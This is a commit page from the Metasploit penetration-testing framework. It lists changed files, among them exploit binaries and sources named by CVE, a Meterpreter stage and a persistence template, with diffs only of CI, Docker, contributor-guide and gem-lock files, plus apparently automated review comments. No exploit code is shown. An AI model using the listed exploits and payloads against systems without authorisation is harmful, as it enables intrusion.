
Merge remote-tracking branch 'upstream/master' into land-10812-

Brent Cook 9 months ago
parent
commit
5fc7167beb
100 changed files with 8457 additions and 910 deletions
  1. 2
    0
      .dockerignore
  2. 2
    0
      .github/PULL_REQUEST_TEMPLATE.md
  3. 0
    1
      .mailmap
  4. 1
    1
      .ruby-version
  5. 7
    5
      .travis.yml
  6. 1
    1
      CODE_OF_CONDUCT.md
  7. 44
    70
      CONTRIBUTING.md
  8. 15
    10
      Dockerfile
  9. 2
    0
      Gemfile
  10. 67
    56
      Gemfile.lock
  11. 1
    5
      LICENSE
  12. 74
    73
      LICENSE_GEMS
  13. 1
    1
      config/database.yml.travis
  14. 0
    11
      data/cpuinfo/build.sh
  15. 0
    64
      data/cpuinfo/cpuinfo.c
  16. BIN
      data/cpuinfo/cpuinfo.exe
  17. BIN
      data/cpuinfo/cpuinfo.ia32.bin
  18. BIN
      data/cpuinfo/cpuinfo.ia64.bin
  19. BIN
      data/exploits/CVE-2012-6636/armeabi/libndkstager.so
  20. BIN
      data/exploits/CVE-2012-6636/mips/libndkstager.so
  21. BIN
      data/exploits/CVE-2012-6636/x86/libndkstager.so
  22. BIN
      data/exploits/CVE-2016-4557/suidhelper
  23. BIN
      data/exploits/CVE-2018-0824/UnmarshalPwn.exe
  24. 16
    0
      data/exploits/CVE-2018-0824/script_template
  25. 182
    0
      data/exploits/CVE-2018-4233/int64.js
  26. BIN
      data/exploits/CVE-2018-4233/stage1.bin
  27. 78
    0
      data/exploits/CVE-2018-4233/utils.js
  28. BIN
      data/exploits/CVE-2018-4237/ssudo
  29. BIN
      data/exploits/CVE-2018-4404/stage2.dylib
  30. BIN
      data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe
  31. BIN
      data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe
  32. 52
    0
      data/exploits/cve-2018-18955/subshell.c
  33. BIN
      data/exploits/cve-2018-18955/subshell.out
  34. 272
    0
      data/exploits/cve-2018-18955/subuid_shell.c
  35. BIN
      data/exploits/cve-2018-18955/subuid_shell.out
  36. 2
    1
      data/exploits/evasion_shellcode.js
  37. 2
    1
      data/exploits/hta_evasion.hta
  38. BIN
      data/exploits/juicypotato/juicypotato.x64.dll
  39. BIN
      data/exploits/juicypotato/juicypotato.x86.dll
  40. 304
    0
      data/exploits/persistence_service/service.erb
  41. 13
    0
      data/headers/windows/Windows.h
  42. 2
    0
      data/headers/windows/stdlib.h
  43. 1
    1
      data/logos/metasploit-v5.txt
  44. BIN
      data/meterpreter/x64_osx_stage
  45. 919
    2
      data/wordlists/joomla.txt
  46. 1
    0
      data/wordlists/unix_users.txt
  47. 1
    0
      data/ysoserial_payloads.json
  48. 3583
    483
      db/modules_metadata_base.json
  49. 1
    1
      docker-compose.override.yml
  50. 1
    2
      docker-compose.yml
  51. 5
    0
      docker/database.yml
  52. 22
    11
      docker/entrypoint.sh
  53. 9
    14
      documentation/api/v1/auth_api_doc.rb
  54. 17
    1
      documentation/api/v1/credential_api_doc.rb
  55. 104
    1
      documentation/api/v1/event_api_doc.rb
  56. 1
    1
      documentation/api/v1/host_api_doc.rb
  57. 2
    2
      documentation/api/v1/login_api_doc.rb
  58. 17
    6
      documentation/api/v1/loot_api_doc.rb
  59. 1
    1
      documentation/api/v1/note_api_doc.rb
  60. 9
    0
      documentation/api/v1/root_api_doc.rb
  61. 1
    1
      documentation/api/v1/service_api_doc.rb
  62. 1
    1
      documentation/api/v1/session_api_doc.rb
  63. 33
    4
      documentation/api/v1/session_event_api_doc.rb
  64. 2
    30
      documentation/api/v1/vuln_api_doc.rb
  65. 1
    1
      documentation/api/v1/workspace_api_doc.rb
  66. 48
    0
      documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md
  67. 28
    0
      documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md
  68. 47
    0
      documentation/modules/auxiliary/admin/smb/webexec_command.md
  69. 36
    0
      documentation/modules/auxiliary/dos/scada/allen_bradley_pccc.md
  70. 76
    0
      documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md
  71. 124
    0
      documentation/modules/auxiliary/gather/cisco_rv320_config.md
  72. 77
    0
      documentation/modules/auxiliary/gather/office365userenum.md
  73. 70
    47
      documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md
  74. 47
    0
      documentation/modules/auxiliary/scanner/http/cisco_device_manager.md
  75. 63
    0
      documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
  76. 46
    0
      documentation/modules/auxiliary/scanner/http/influxdb_enum.md
  77. 48
    0
      documentation/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.md
  78. 36
    0
      documentation/modules/auxiliary/scanner/misc/ibm_mq_enum.md
  79. 53
    0
      documentation/modules/auxiliary/scanner/misc/ibm_mq_login.md
  80. 59
    0
      documentation/modules/auxiliary/scanner/misc/java_jmx_scanner.md
  81. 21
    0
      documentation/modules/auxiliary/scanner/msmail/exchange_enum.md
  82. 42
    0
      documentation/modules/auxiliary/scanner/msmail/host_id.md
  83. 25
    0
      documentation/modules/auxiliary/scanner/msmail/onprem_enum.md
  84. 47
    0
      documentation/modules/auxiliary/scanner/sip/options_tcp.md
  85. 143
    0
      documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md
  86. 49
    0
      documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md
  87. 39
    0
      documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
  88. 167
    0
      documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md
  89. 21
    0
      documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md
  90. 170
    0
      documentation/modules/auxiliary/server/capture/ftp.md
  91. 271
    0
      documentation/modules/auxiliary/server/capture/http_basic.md
  92. 174
    0
      documentation/modules/auxiliary/server/capture/imap.md
  93. 72
    0
      documentation/modules/auxiliary/server/capture/mysql.md
  94. 43
    0
      documentation/modules/auxiliary/server/capture/postgresql.md
  95. 73
    0
      documentation/modules/auxiliary/server/capture/printjob_capture.md
  96. 57
    0
      documentation/modules/auxiliary/server/capture/telnet.md
  97. 69
    0
      documentation/modules/auxiliary/server/capture/vnc.md
  98. 78
    0
      documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md
  99. 166
    0
      documentation/modules/exploit/linux/asan_suid_executable_priv_esc.md
  100. 0
    0
      documentation/modules/exploit/linux/http/cisco_firepower_useradd.md

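--- a/.dockerignore
+++ b/.dockerignore
@@ -5,6 +5,8 @@ docker-compose*.yml
 docker/
 !docker/msfconsole.rc
 !docker/entrypoint.sh
+!docker/database.yml
+Dockerfile
 README.md
 .git/
 .github/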

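--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -2,6 +2,8 @@
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.
 
+Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
+
 ## Verification
 
 List the steps needed to make sure this thing works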

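--- a/.mailmap
+++ b/.mailmap
@@ -64,7 +64,6 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
 
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
-bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>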

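--- a/.ruby-version
+++ b/.ruby-version
@@ -1 +1 @@
-2.5.1
+2.5.3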

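--- a/.travis.yml
+++ b/.travis.yml
@@ -11,22 +11,23 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.3.7'
-  - '2.4.4'
-  - '2.5.1'
+  - '2.3.8'
+  - '2.4.5'
+  - '2.5.3'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
   # Used for testing the remote data service
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
 
 matrix:
   fast_finish: true
   exclude:
-  - rvm: '2.3.7'
+  - rvm: '2.3.8'
     env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - rvm: '2.4.4'
+  - rvm: '2.4.5'
     env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
 
 jobs:
@@ -48,6 +49,7 @@ before_install:
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
   # Update the bundler
+  - gem update --system
   - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml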
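Review bot: The new `gem update --system` line in before_install is unpinned, so every CI run installs whatever RubyGems release is current at that moment, which makes builds non-reproducible and lets a bad or compromised RubyGems release reach CI immediately; pin it, `gem update --system <version>`, and pin bundler to the lockfile's `BUNDLED WITH` version with `gem install bundler -v 1.17.3`. The newly added `--tag ~content` REMOTE_DB=1 env entry has no counterpart in matrix.exclude, so unlike its `--tag content` sibling it will also run on 2.3.8 and 2.4.5. If that asymmetry is intended, a comment next to the new entry saying so would save the next reader a question; otherwise add matching exclude entries for both rubies.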

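--- a/CODE_OF_CONDUCT.md
+++ b/CODE_OF_CONDUCT.md
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report directly to
-egypt@metasploit.com or todb@metasploit.com.
+caitlin_condon@rapid7.com or todb@metasploit.com.
 
 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.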

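--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,82 +1,54 @@
 # Hello, World!
 
 Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!
-
-Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
-Please try to be as specific as you can about your problem; include steps
-to reproduce (cut and paste from your console output if it's helpful) and
-what you were expecting to happen.
-
-Are you about to report a security vulnerability in Metasploit itself?
-How ironic! Please take a look at Rapid7's [Vulnerability
-Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
-your report to security@rapid7.com using our [PGP key].
-
-Are you about to contribute some new functionality, a bug fix, or a new
-Metasploit module? If so, read on...
+world -- a better place!  Before you get started, review our
+[Code of Conduct].  There are mutliple ways to help beyond just writing code:
+ - [Submit bugs and feature requests] with detailed information about your issue or idea.
+ - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
+ - [Report a security vulnerability in Metasploit itself] to Rapid7.
+ - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
+   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
 
 # Contributing to Metasploit
 
-What you see here in CONTRIBUTING.md is a bullet point list of the do's
-and don'ts of how to make sure *your* valuable contributions actually
-make it into Metasploit's master branch.
-
-If you care not to follow these rules, your contribution **will** be
-closed. Sorry!
-
-This is intended to be a **short** list. The [wiki] is much more
-exhaustive and reveals many mysteries. If you read nothing else, take a
-look at the standard [development environment setup] guide
-and Metasploit's [Common Coding Mistakes].
+Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
+it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
+**will** be closed. Sorry!
 
 ## Code Contributions
 
-* **Do** stick to the [Ruby style guide].
-* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Don't** use the default merge messages when merging from other branches.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
- If you do not send a PR from a topic branch, the history of your PR will be
- lost as soon as you update your own master branch. See
- https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
- this in action.
-
+* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
+  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
+  you update your own master branch.
 
 ### Pull Requests
 
-* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
+* **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
-* **Do** write [release notes] once a pull request is landed.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 
-Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
+Pull request [PR#9966] is a good example to follow.
 
 #### New Modules
 
-* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
-  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
-* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
+* **Do** use the many module mixin [API]s.
 * **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
-
-
-
-#### Scripts
-
-* **Don't** submit new [scripts].  Scripts are shipped as examples for
-  automating local tasks, and anything "serious" can be done with post
-  modules and local exploits.
+* **Do** include [Module Documentation] showing sample run-throughs.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
+  anything "serious" can be done with post modules and local exploits.
 
 #### Library Code
 
-* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
+* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
@@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
 #### Bug Fixes
 
 * **Do** include reproduction steps in the form of verification steps.
-* **Do** include a link to any corresponding [Issues] in the format of
-  `See #1234` in your commit description.
+* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
 
 ## Bug Reports
 
-* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
+Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security). 
+
+When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
+* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
 
-If you need some more guidance, talk to the main body of open
-source contributors over on the [Freenode IRC channel],
-or e-mail us at the [metasploit-hackers] mailing list.
+If you need some more guidance, talk to the main body of open source contributors over on our
+[Metasploit Slack] or [#metasploit on Freenode IRC].
 
-Also, **thank you** for taking the few moments to read this far! You're
-already way ahead of the curve, so keep it up!
+Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
+curve, so keep it up!
 
-[Issue Tracker]:http://r-7.co/MSF-BUGv1
-[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
-[wiki]:https://github.com/rapid7/metasploit-framework/wiki
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
-[development environment setup]:http://r-7.co/MSF-DEV
-[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
+[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
+[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
+[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
+[development environment]:http://r-7.co/MSF-DEV
+[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
+[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
-[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
-[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
+[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
+[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://betterspecs.org
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
+[Metasploit Slack]:https://www.metasploit.com/slack
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4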

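--- a/Dockerfile
+++ b/Dockerfile
@@ -1,12 +1,12 @@
-FROM ruby:2.5.1-alpine3.7 AS builder
+FROM ruby:2.5.3-alpine3.7 AS builder
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
-ENV APP_HOME /usr/src/metasploit-framework/
+ENV APP_HOME=/usr/src/metasploit-framework
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
 
-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
 COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
 COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
 COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
@@ -37,26 +37,31 @@ RUN apk add --no-cache \
     && chmod -R a+r /usr/local/bundle
 
 
-FROM ruby:2.5.1-alpine3.7
+FROM ruby:2.5.3-alpine3.7
 LABEL maintainer="Rapid7"
 
-ENV APP_HOME /usr/src/metasploit-framework/
+ENV APP_HOME=/usr/src/metasploit-framework
 ENV NMAP_PRIVILEGED=""
+ENV METASPLOIT_GROUP=metasploit
 
-COPY --from=builder /usr/local/bundle /usr/local/bundle
-COPY . $APP_HOME
+# used for the copy command
+RUN addgroup -S $METASPLOIT_GROUP
 
 RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
 
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
+COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
+COPY --chown=root:metasploit . $APP_HOME/
+RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
+
 WORKDIR $APP_HOME
+
 # we need this entrypoint to dynamically create a user
 # matching the hosts UID and GID so we can mount something
 # from the users home directory. If the IDs don't match
-# it results in access denied errors. Once docker has
-# a solution for this we can revert it back to normal
+# it results in access denied errors.
 ENTRYPOINT ["docker/entrypoint.sh"]
 
-CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]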
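Review bot: The new CMD on the last line passes `$APP_HOME/config/database.yml` in JSON exec form, and Docker performs no variable expansion in exec form, so msfconsole receives the literal string `$APP_HOME/config/database.yml` unless `docker/entrypoint.sh` (changed in this commit but outside this section) expands it before handing the arguments on. Since WORKDIR is already `$APP_HOME`, the relative form used for the `-r` argument works here as well: `CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "config/database.yml"]`. Separately, `RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml` runs as root after the `--chown=root:metasploit` COPY, so the resulting config is root-owned with the default mode rather than the group ownership the COPY lines set up; if that file carries database credentials (its contents are not visible here, and it is now explicitly un-ignored by `.dockerignore` so it is baked into the image), it is worth following the cp with `chgrp $METASPLOIT_GROUP` and `chmod 640` and saying so in a comment.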

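--- a/Gemfile
+++ b/Gemfile
@@ -3,6 +3,8 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'
 
+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
   # code coverage for tests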
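Review bot: The new `gem 'sqlite3', '~>1.3.0'` line carries no comment explaining why the Gemfile re-declares a gem the gemspec already provides (Gemfile.lock lists a bare `sqlite3` under the PATH specs, i.e. without a version constraint), and an unexplained pessimistic cap like this is exactly the line a later cleanup removes as redundant. A one-line comment above it, e.g. `# Cap sqlite3 to the 1.3.x series; the gemspec names the gem without a version constraint`, would preserve the intent. The actual reason for the cap is not visible in this commit, so adjust the wording to whatever motivated it.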

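--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.0)
+    metasploit-framework (5.0.5)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -9,8 +9,10 @@ PATH
       bcrypt
       bcrypt_pbkdf
       bit-struct
+      concurrent-ruby (= 1.0.5)
       dnsruby
       ed25519
+      em-http-request
       faker
       filesize
       jsobfu
@@ -19,9 +21,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.52)
+      metasploit-payloads (= 1.3.61)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.4.2)
+      metasploit_payloads-mettle (= 0.5.6)
       mqtt
       msgpack
       nessus_rest
@@ -66,7 +68,6 @@ PATH
       sinatra
       sqlite3
       sshkey
-      sysrandom
       thin
       tzinfo
       tzinfo-data
@@ -79,27 +80,27 @@ GEM
   remote: https://rubygems.org/
   specs:
     Ascii85 (1.0.3)
-    actionpack (4.2.10)
-      actionview (= 4.2.10)
-      activesupport (= 4.2.10)
+    actionpack (4.2.11)
+      actionview (= 4.2.11)
+      activesupport (= 4.2.11)
       rack (~> 1.6)
       rack-test (~> 0.6.2)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.10)
-      activesupport (= 4.2.10)
+    actionview (4.2.11)
+      activesupport (= 4.2.11)
       builder (~> 3.1)
       erubis (~> 2.7.0)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.10)
-      activesupport (= 4.2.10)
+    activemodel (4.2.11)
+      activesupport (= 4.2.11)
       builder (~> 3.1)
-    activerecord (4.2.10)
-      activemodel (= 4.2.10)
-      activesupport (= 4.2.10)
+    activerecord (4.2.11)
+      activemodel (= 4.2.11)
+      activesupport (= 4.2.11)
       arel (~> 6.0)
-    activesupport (4.2.10)
+    activesupport (4.2.11)
       i18n (~> 0.7)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
@@ -118,33 +119,43 @@ GEM
     builder (3.2.3)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
+    cookiejar (0.3.3)
     crass (1.0.4)
-    daemons (1.2.6)
+    daemons (1.3.1)
     diff-lcs (1.3)
     dnsruby (1.61.2)
       addressable (~> 2.5)
     docile (1.3.1)
     ed25519 (1.2.4)
+    em-http-request (1.1.5)
+      addressable (>= 2.3.4)
+      cookiejar (!= 0.3.1)
+      em-socksify (>= 0.3)
+      eventmachine (>= 1.0.3)
+      http_parser.rb (>= 0.6.0)
+    em-socksify (0.3.2)
+      eventmachine (>= 1.0.0.beta.4)
     erubis (2.7.0)
     eventmachine (1.2.7)
-    factory_bot (4.11.1)
-      activesupport (>= 3.0.0)
-    factory_bot_rails (4.11.1)
-      factory_bot (~> 4.11.1)
-      railties (>= 3.0.0)
+    factory_bot (5.0.0)
+      activesupport (>= 4.2.0)
+    factory_bot_rails (5.0.0)
+      factory_bot (~> 5.0.0)
+      railties (>= 4.2.0)
     faker (1.9.1)
       i18n (>= 0.7)
-    faraday (0.15.3)
+    faraday (0.15.4)
       multipart-post (>= 1.2, < 3)
     filesize (0.2.0)
     fivemat (1.3.7)
     hashery (2.1.2)
+    http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.1.0)
-    loofah (2.2.2)
+    loofah (2.2.3)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     metasm (1.0.3)
@@ -152,12 +163,12 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (3.0.1)
+    metasploit-credential (3.0.3)
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 3.0.0)
       net-ssh
-      pg (~> 0.15)
+      pg
       railties
       rex-socket
       rubyntlm
@@ -166,39 +177,39 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.52)
-    metasploit_data_models (3.0.1)
+    metasploit-payloads (1.3.61)
+    metasploit_data_models (3.0.5)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
       metasploit-concern
       metasploit-model
-      pg (= 0.20.0)
+      pg
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.4.2)
-    method_source (0.9.0)
-    mini_portile2 (2.3.0)
+    metasploit_payloads-mettle (0.5.6)
+    method_source (0.9.2)
+    mini_portile2 (2.4.0)
     minitest (5.11.3)
     mqtt (0.5.0)
-    msgpack (1.2.4)
+    msgpack (1.2.6)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
-    net-ssh (5.0.2)
+    net-ssh (5.1.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.8.4)
-      mini_portile2 (~> 2.3.0)
-    octokit (4.12.0)
+    nokogiri (1.10.1)
+      mini_portile2 (~> 2.4.0)
+    octokit (4.13.0)
       sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.1)
+    openssl-ccm (1.2.2)
     openvas-omp (0.0.4)
     packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.13.0)
-    pdf-reader (2.1.0)
+    pdf-reader (2.2.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -210,11 +221,11 @@ GEM
       activerecord (~> 4.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.11.3)
+    pry (0.12.2)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
     public_suffix (3.0.3)
-    rack (1.6.10)
+    rack (1.6.11)
     rack-protection (1.5.5)
       rack
     rack-test (0.6.3)
@@ -227,19 +238,19 @@ GEM
       rails-deprecated_sanitizer (>= 1.0.1)
     rails-html-sanitizer (1.0.4)
       loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.10)
-      actionpack (= 4.2.10)
-      activesupport (= 4.2.10)
+    railties (4.2.11)
+      actionpack (= 4.2.11)
+      activesupport (= 4.2.11)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.3.1)
+    rake (12.3.2)
     rb-readline (0.5.5)
-    recog (2.1.24)
+    recog (2.1.45)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.13)
       rex-text
-    rex-bin_tools (0.1.4)
+    rex-bin_tools (0.1.6)
       metasm
       rex-arch
       rex-core
@@ -250,7 +261,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.19)
+    rex-exploitation (0.1.20)
       jsobfu
       metasm
       rex-arch
@@ -290,13 +301,13 @@ GEM
       rspec-mocks (~> 3.8.0)
     rspec-core (3.8.0)
       rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.1)
+    rspec-expectations (3.8.2)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.8.0)
     rspec-mocks (3.8.0)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.8.0)
-    rspec-rails (3.8.0)
+    rspec-rails (3.8.2)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
@@ -309,7 +320,7 @@ GEM
     rspec-support (3.8.0)
     ruby-macho (2.1.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (1.0.4)
+    ruby_smb (1.0.5)
       bindata
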